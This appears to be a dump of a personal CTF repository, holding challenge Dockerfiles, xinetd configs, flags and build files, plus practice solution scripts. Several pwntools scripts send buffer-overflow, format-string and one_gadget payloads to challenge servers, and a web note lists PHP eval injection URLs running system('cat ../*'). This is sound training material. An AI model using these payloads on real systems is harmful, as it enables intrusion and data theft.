| gcc -g main.c handler.c ucutils.c mem.c utils.c -I./unicorn/include/ -L./unicorn/ -o unicornsAisle -lunicorn -lpthread 3 | strip unicornsAisle 4 | nasm -f elf64 -o encounter.o encounter.S 5 | ld encounter.o -o encounter.bin --oformat=binary 6 | printf "\x08\x00\x00\x00\x00\x00\x00\x00" | cat - encounter.bin > encounter.emu 7 | rm encounter.bin encounter.o 8 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Unicorns_Aisle/sourcecode/Server/guestcontext.h: -------------------------------------------------------------------------------- 1 | #ifndef __GUESTCONTEXT_HEADER__ 2 
| #define __GUESTCONTEXT_HEADER__ 3 | 4 | #include 5 | #include"mem.h" 6 | 7 | #define NOTENTRY (0) 8 | #define NOENTRY ((void*)0) 9 | 10 | typedef struct GUESTCONTEXT{ 11 | void *canaryPage; 12 | void *brk; 13 | void *stackBottom; 14 | MEMLIST *sysMemList; 15 | MEMLIST *usrMemList; 16 | void *entry; 17 | uc_engine *uc; 18 | }GUESTCONTEXT; 19 | 20 | #endif 21 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Unicorns_Aisle/sourcecode/Server/main.h: -------------------------------------------------------------------------------- 1 | #ifndef __MAIN_HEADER__ 2 | #define __MAIN_HEADER__ 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include"utils.h" 12 | #include"guestcontext.h" 13 | #include"mem.h" 14 | #include"ucutils.h" 15 | #include"handler.h" 16 | 17 | #endif 18 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Unicorns_Aisle/sourcecode/Server/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | LD_LIBRARY_PATH=./unicorn/ ./unicornsAisle ./encounter.emu 3 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Unicorns_Aisle/sourcecode/Server/utils.h: -------------------------------------------------------------------------------- 1 | #ifndef __UTILS_HEADER__ 2 | #define __UTILS_HEADER__ 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #define MIN(x,y) (x>y?x:y) /* NOTE(review): despite its name this expands to the larger operand (x>y selects x), and the arguments are unparenthesized, so operands built from lower-precedence operators change the grouping; callers are not visible here, so confirm whether this is intended before relying on it as a bound. A conventional minimum is ((x)<(y)?(x):(y)). */ 10 | 11 | void printError(char *msg); 12 | size_t getRand(int width); 13 | 14 | #endif 15 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Variable_Machine_Revenge/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:disco-20200114 2 | MAINTAINER James 3 | 4 | RUN sed -i -re 
's/([a-z]{2}\.)?archive.ubuntu.com|security.ubuntu.com/old-releases.ubuntu.com/g' /etc/apt/sources.list && \ 5 | apt-get update && \ 6 | DEBIAN_FRONTEND=noninteractive apt-get install -qy xinetd 7 | RUN useradd -m VMRevenge 8 | RUN chown -R root:root /home/VMRevenge 9 | RUN chmod -R 755 /home/VMRevenge 10 | 11 | CMD ["/usr/sbin/xinetd","-dontfork"] 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Variable_Machine_Revenge/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | vmrevenge: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/VMRevenge:ro 8 | - ./xinetd:/etc/xinetd.d/variable_machine_revenge:ro 9 | ports: 10 | - "10105:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Variable_Machine_Revenge/distribute/share/flag: -------------------------------------------------------------------------------- 1 | flag{thr3ad1ng_w17h0ut_10ck_15_5o0O0o0oO_d4ng3r0us} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Variable_Machine_Revenge/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/VMRevenge/variable_machine_revenge 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Variable_Machine_Revenge/distribute/share/variable_machine_revenge: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Variable_Machine_Revenge/distribute/share/variable_machine_revenge -------------------------------------------------------------------------------- 
/MyChallenges/Pwn/Variable_Machine_Revenge/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service variable_machine_revenge 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/VMRevenge/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = VMRevenge 10 | port = 10101 11 | flags = REUSE 12 | } 13 | 14 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Variable_Machine_Revenge/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | patch -t -p0 2 | 3 | #ifndef GC_ 4 | #define GC_ 5 | 6 | typedef struct garbage{ 7 | void *ptr; 8 | int ref; 9 | struct garbage *next; 10 | }garbage; 11 | 12 | garbage *head; 13 | 14 | void *gcCalloc(int count, int size); 15 | int gcFree(void *ptr); 16 | void *gcStart(); 17 | garbage *getHead(void *ptr); 18 | 19 | #endif -------------------------------------------------------------------------------- /MyChallenges/Pwn/Variable_Machine_Revenge/sourcecode/src/Makefile: -------------------------------------------------------------------------------- 1 | CC=clang 2 | OBJS=vm.o gc.o main.o 3 | TARGET=main 4 | CFLAGS=-std=c99 -fPIC 5 | 6 | 7 | all: $(TARGET) 8 | 9 | $(TARGET): $(OBJS) 10 | $(CC) -o $@ $(OBJS) -pie -lpthread -------------------------------------------------------------------------------- /MyChallenges/Pwn/Wheel_of_Fortune/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Wheel of Fortune 3 | 4 | Category : 5 | Pwn, Misc 6 | 7 | Desc : 8 | The wheel of fortune tells your fortune... 
9 | 10 | Estimated Difficulty : 11 | 3/10 12 | 13 | Note : 14 | Original version had a BOF in read_num, which is fixed here 15 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Wheel_of_Fortune/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:focal 2 | MAINTAINER James 3 | 4 | RUN apt-get update 5 | RUN apt-get install xinetd -qy 6 | RUN useradd -m WOF 7 | RUN chown -R root:root /home/WOF 8 | RUN chmod -R 755 /home/WOF 9 | 10 | CMD ["/usr/sbin/xinetd","-dontfork"] 11 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Wheel_of_Fortune/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | wof: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/WOF:ro 8 | - ./xinetd:/etc/xinetd.d/wof:ro 9 | ports: 10 | - "10102:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Wheel_of_Fortune/distribute/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{Deny_Thy_Fortune_and_Refuse_Thy_Doom} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Wheel_of_Fortune/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/WOF/wheel_of_fortune 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Wheel_of_Fortune/distribute/share/wheel_of_fortune: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Wheel_of_Fortune/distribute/share/wheel_of_fortune 
-------------------------------------------------------------------------------- /MyChallenges/Pwn/Wheel_of_Fortune/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service wof 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/WOF/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = WOF 10 | bind = 0.0.0.0 11 | port = 10101 12 | flags = REUSE 13 | } 14 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Wheel_of_Fortune/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -Wl,-z,now -fpie -fstack-protector-all wheel_of_fortune.c -o wheel_of_fortune 3 | strip wheel_of_fortune 4 | 5 | clean: 6 | rm wheel_of_fortune 7 | -------------------------------------------------------------------------------- /MyChallenges/SmartContract/Draupnir/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Draupnir 3 | 4 | Category : 5 | Smart Contract, Misc (Not Smart Contract) 6 | 7 | Desc : 8 | Ninth the night, ninth the price 9 | 10 | Credits : 11 | infra code is modified from ParadigmCTF repo (https://github.com/paradigm-operations/paradigm-ctf-2021) 12 | 13 | Estimated Difficulty : 14 | 10/10 15 | -------------------------------------------------------------------------------- /MyChallenges/SmartContract/Draupnir/Draupnir.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/SmartContract/Draupnir/Draupnir.pdf -------------------------------------------------------------------------------- /MyChallenges/SmartContract/Draupnir/contracts/Setup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: GPL-3.0-or-later 2 | 3 | pragma solidity 
0.8.9; 4 | 5 | import "./weth9.sol"; 6 | 7 | contract Setup { 8 | WETH9 public weth; 9 | 10 | constructor() payable { 11 | require(msg.value == 100 ether); 12 | weth = new WETH9(); 13 | weth.deposit{value:msg.value}(); 14 | return; 15 | } 16 | 17 | function isSolved() external view returns (bool) { 18 | return address(weth).balance == 0; 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /MyChallenges/SmartContract/Draupnir/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | draupnir: 5 | build: . 6 | volumes: 7 | - ./share:/home/Draupnir:ro 8 | environment: 9 | - "USERNAME=Draupnir" 10 | - "PORT=10101" 11 | - "HTTP_PORT=10102" 12 | - "ENV=dev" 13 | - "FLAG=BALSN{gan4che_rev3rt_4nd_mu1tiply_1s_s0_sw33t}" 14 | - "PUBLIC_IP=127.0.0.1" 15 | - "RPC_URL=" 16 | ports: 17 | - "10101:10101" 18 | - "10102:10102" 19 | restart: always 20 | -------------------------------------------------------------------------------- /MyChallenges/SmartContract/Draupnir/distribute/share/chal.py: -------------------------------------------------------------------------------- 1 | import eth_sandbox 2 | from web3 import Web3 3 | 4 | eth_sandbox.run_launcher([ 5 | eth_sandbox.new_launch_instance_action(deploy_value=Web3.toWei(100, 'ether')), 6 | eth_sandbox.new_get_flag_action() 7 | ]) 8 | -------------------------------------------------------------------------------- /MyChallenges/SmartContract/Draupnir/distribute/share/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | for f in /home/${USERNAME}/startup/*; do 4 | echo "[+] running $f" 5 | bash "$f" 6 | done 7 | 8 | tail -f /var/log/${USERNAME}/* 9 | -------------------------------------------------------------------------------- /MyChallenges/SmartContract/Draupnir/distribute/share/eth_sandbox/__init__.py: 
-------------------------------------------------------------------------------- 1 | from .auth import * 2 | from .launcher import * 3 | -------------------------------------------------------------------------------- /MyChallenges/SmartContract/Draupnir/distribute/share/eth_sandbox/auth.py: -------------------------------------------------------------------------------- 1 | from uuid import uuid4 2 | 3 | def load_auth_key(): 4 | with open("/tmp/auth", "r") as f: 5 | return f.read() 6 | 7 | def generate_auth_key(): 8 | auth_key = str(uuid4()) 9 | with open("/tmp/auth", "w") as f: 10 | f.write(auth_key) 11 | return auth_key 12 | -------------------------------------------------------------------------------- /MyChallenges/SmartContract/Draupnir/distribute/share/handler.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | exec python3 /home/${USERNAME}/chal.py 2>&1 4 | -------------------------------------------------------------------------------- /MyChallenges/SmartContract/Draupnir/distribute/share/startup/98-start-gunicorn: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | gunicorn \ 4 | --bind 0.0.0.0:$HTTP_PORT \ 5 | --daemon \ 6 | --access-logfile /var/log/${USERNAME}/gunicorn.access.log \ 7 | --error-logfile /var/log/${USERNAME}/gunicorn.error.log \ 8 | eth_sandbox.server:app 9 | -------------------------------------------------------------------------------- /MyChallenges/SmartContract/Draupnir/distribute/share/startup/99-start-xinetd: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | xinetd -filelog /var/log/${USERNAME}/xinetd.log 4 | -------------------------------------------------------------------------------- /MyChallenges/SmartContract/Draupnir/solution/exp.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | python3 exp.py exp.sol 
100 4 | -------------------------------------------------------------------------------- /Practice/CTFS.me/binary_exploitation/namelist.py: -------------------------------------------------------------------------------- 1 | ###Simple buffer overflow of gets()### 2 | 3 | from pwn import * 4 | 5 | r = remote('chall2.ctfs.me',2004) 6 | r.sendlineafter('Name: ',b'\x00'*0x20+p32(1)) 7 | r.interactive() 8 | -------------------------------------------------------------------------------- /Practice/CTFS.me/binary_exploitation/obstacle.py: -------------------------------------------------------------------------------- 1 | ###Write addr and write data by printf() format string attack### 2 | 3 | from pwn import * 4 | 5 | r = remote('chall2.ctfs.me',2005) 6 | 7 | r.sendafter('me:)\n',b'a'*8+p32(0x804a030)+b'%47817c%13$n') 8 | r.interactive() 9 | -------------------------------------------------------------------------------- /Practice/CTFS.me/binary_exploitation/secret.py: -------------------------------------------------------------------------------- 1 | ###Leak data with printf() format string### 2 | 3 | from pwn import * 4 | 5 | r = remote('chall2.ctfs.me',2007) 6 | r.sendlineafter('sesuatu\n','%13$p') 7 | leakdata = r.recv().strip()[2:] 8 | r.sendafter('Rahasia: ',leakdata) 9 | r.interactive() 10 | 11 | -------------------------------------------------------------------------------- /Practice/CTFS.me/binary_exploitation/soeltanbank.py: -------------------------------------------------------------------------------- 1 | ##gets() overflow and change variable value### 2 | 3 | from pwn import * 4 | 5 | r = remote('chall2.ctfs.me',2008) 6 | r.sendlineafter('Nama: ',b'\x00'*0x80+p32(0x5f5e0ff)) 7 | r.interactive() 8 | -------------------------------------------------------------------------------- /Practice/CTFS.me/binary_exploitation/thoughtfuldecision.py: -------------------------------------------------------------------------------- 1 | ###Straightforward buffer overflow 
on gets### 2 | 3 | from pwn import * 4 | 5 | r = remote('chall2.ctfs.me',2011) 6 | sys = 0x40069a 7 | r.sendlineafter('Just tell your story down here\n',b'a'*0x48+p64(sys)) 8 | r.interactive() 9 | 10 | -------------------------------------------------------------------------------- /Practice/CTFS.me/cryptography/as_beautiful_as_ruby.py: -------------------------------------------------------------------------------- 1 | ###Brute force search small random space### 2 | 3 | crypt = open("rubyflag").read()[1:-2] 4 | length = len(crypt) 5 | crypt = crypt[length//15:2*length//15] 6 | length = len(crypt) 7 | a = int('1'+'0'*(length),2) 8 | for i in range(8): 9 | crypt = crypt[1:]+crypt[0] 10 | flag = [] 11 | for j in range(0,length,8): 12 | flag.append(int(crypt[j:j+8],2)) 13 | print(''.join(list(map(chr,flag)))) 14 | -------------------------------------------------------------------------------- /Practice/CTFS.me/reverse/balikin.py: -------------------------------------------------------------------------------- 1 | ###Simple XOR decode### 2 | 3 | from Crypto.Cipher import XOR 4 | import base64 5 | 6 | key = "RENDANGBASOGULING" 7 | cipher = XOR.new(key) 8 | crypt = 'Dof99eGO8erh6/nvnfPn9eGX6/j84fzv5fLh8u/t5/fzh+P79PTj8vfq/fXa3M0=' 9 | mid = cipher.encrypt(base64.b64decode(crypt)) 10 | fin = '' 11 | kr = 0 12 | for i in mid: 13 | fin+=chr(int(i)-ord(key[kr%len(key)])) 14 | kr+=1 15 | print(fin[::-1]) 16 | -------------------------------------------------------------------------------- /Practice/CTFS.me/reverse/privateroom.py: -------------------------------------------------------------------------------- 1 | ###Simple Calculations### 2 | 3 | from pwn import * 4 | flag = [233, 129, 9, 5, 130, 194, 195, 39, 75, 229] 5 | 6 | inp = '' 7 | for i in flag: 8 | char = bin(i)[2:].rjust(8,'0') 9 | char = ((int(char[3:],2)^15)<<3) + (int(char[:3],2)^3) 10 | print(char) 11 | inp+=chr(char) 12 | print(inp) 13 | 
-------------------------------------------------------------------------------- /Practice/CTFS.me/reverse/resqua.py: -------------------------------------------------------------------------------- 1 | ###Encodes partial binary with self function### 2 | #####Patch binary with gdb x/gx hex after unlock function 3 | 4 | import math 5 | 6 | for i in range(10000,1110,-1): 7 | if '0' in str(i): 8 | continue 9 | num = math.sqrt(i) 10 | if num//1==num: 11 | print(num**2) 12 | -------------------------------------------------------------------------------- /Practice/CTFS.me/reverse/reverseme1.txt: -------------------------------------------------------------------------------- 1 | ###Trivial### 2 | generate pseudocode with IDA Pro and all is clear 3 | -------------------------------------------------------------------------------- /Practice/CTFS.me/web_exploitation/Baby_RCE_1.txt: -------------------------------------------------------------------------------- 1 | ###Simple RCE with controllable eval() content### 2 | # notice that '!!!' is concatenated at the end of string 3 | # use comment to bypass !!!
4 | 5 | ###Tried commands 6 | http://chall2.ctfs.me:8010/index.php?name=echo(system('ls'));// 7 | http://chall2.ctfs.me:8010/index.php?name=echo(system('ls ../'));// 8 | http://chall2.ctfs.me:8010/index.php?name=echo(system('cat ../*'));// 9 | 10 | 11 | ###shell_exec works as well as system 12 | http://chall2.ctfs.me:8010/index.php?name=echo(shell_exec('cat ../*'));// 13 | -------------------------------------------------------------------------------- /Practice/Eonew.cn/Black_Hole/black_hole: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Black_Hole/black_hole -------------------------------------------------------------------------------- /Practice/Eonew.cn/Blockade/blockade: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Blockade/blockade -------------------------------------------------------------------------------- /Practice/Eonew.cn/Car_Store/car_store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Car_Store/car_store -------------------------------------------------------------------------------- /Practice/Eonew.cn/Easy_ASAN/easy_asan: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Easy_ASAN/easy_asan -------------------------------------------------------------------------------- /Practice/Eonew.cn/Easy_Printf/easy_printf: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Easy_Printf/easy_printf -------------------------------------------------------------------------------- /Practice/Eonew.cn/Easy_Stack/easy_stack: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Easy_Stack/easy_stack -------------------------------------------------------------------------------- /Practice/Eonew.cn/Easy_Stack/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ###Addr 4 | # libc2.27 5 | libc_start_offset = 0x21ab0 6 | restart_offset = 0x21b90 7 | one_gadget = 0x10a38c 8 | 9 | ###Exploit 10 | r = remote('nc.eonew.cn',10004) 11 | r.sendline(b'a'*0x88+p8(restart_offset&0xff)) 12 | restart_addr = u64(r.recvline()[0x88:-1]+b'\x00\x00') 13 | libc_base = restart_addr-restart_offset 14 | print(hex(libc_base)) 15 | r.sendline(b'a'*0x88+p64(libc_base+one_gadget)) 16 | r.interactive() 17 | -------------------------------------------------------------------------------- /Practice/Eonew.cn/Fog/fog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Fog/fog -------------------------------------------------------------------------------- /Practice/Eonew.cn/HTTP_Server/server: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/HTTP_Server/server -------------------------------------------------------------------------------- /Practice/Eonew.cn/House_of_Storm/house_of_storm: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/House_of_Storm/house_of_storm -------------------------------------------------------------------------------- /Practice/Eonew.cn/Kernel_Pwn1/test1.ko: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Kernel_Pwn1/test1.ko -------------------------------------------------------------------------------- /Practice/Eonew.cn/Kernel_Pwn2/test2.ko: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Kernel_Pwn2/test2.ko -------------------------------------------------------------------------------- /Practice/Eonew.cn/Link_List/link_list: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Link_List/link_list -------------------------------------------------------------------------------- /Practice/Eonew.cn/Login/login: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Login/login -------------------------------------------------------------------------------- /Practice/Eonew.cn/Mimic_Heap/mimic: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Mimic_Heap/mimic -------------------------------------------------------------------------------- /Practice/Eonew.cn/Mimic_Heap/mimic_heap: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Mimic_Heap/mimic_heap -------------------------------------------------------------------------------- /Practice/Eonew.cn/Mimic_Stack/mimic: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Mimic_Stack/mimic -------------------------------------------------------------------------------- /Practice/Eonew.cn/Mimic_Stack/mimic_stack_x64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Mimic_Stack/mimic_stack_x64 -------------------------------------------------------------------------------- /Practice/Eonew.cn/Mimic_Stack/mimic_stack_x86: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Mimic_Stack/mimic_stack_x86 -------------------------------------------------------------------------------- /Practice/Eonew.cn/Mountain/mountain: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Mountain/mountain -------------------------------------------------------------------------------- /Practice/Eonew.cn/No_Leak/no_leak: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/No_Leak/no_leak -------------------------------------------------------------------------------- /Practice/Eonew.cn/Shellcode/shellcode: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Shellcode/shellcode -------------------------------------------------------------------------------- /Practice/Eonew.cn/Time_Heap/time_heap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Time_Heap/time_heap -------------------------------------------------------------------------------- /Practice/Eonew.cn/Truncate_String/truncate_string: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Truncate_String/truncate_string -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/Addis_Ababa.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Addis_Ababa.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/Algiers.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Algiers.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/Bangalore.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Bangalore.zip -------------------------------------------------------------------------------- 
/Practice/MicroCorruption/Challenge_ROMS/Chernobyl.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Chernobyl.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/Cusco.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Cusco.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/Hanoi.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Hanoi.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/Hollywood.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Hollywood.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/Jakarta.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Jakarta.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/Johannesburg.zip: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Johannesburg.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/Lagos.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Lagos.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/Montevideo.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Montevideo.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/New_Orleans.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/New_Orleans.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/Novosibirsk.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Novosibirsk.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/Reykjavik.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Reykjavik.zip 
-------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/Santa_Cruz.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Santa_Cruz.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/Sydney.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Sydney.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/Tutorial.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Tutorial.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/Vladivostok.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Vladivostok.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/Whitehorse.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Whitehorse.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/LockITProManual.pdf: 
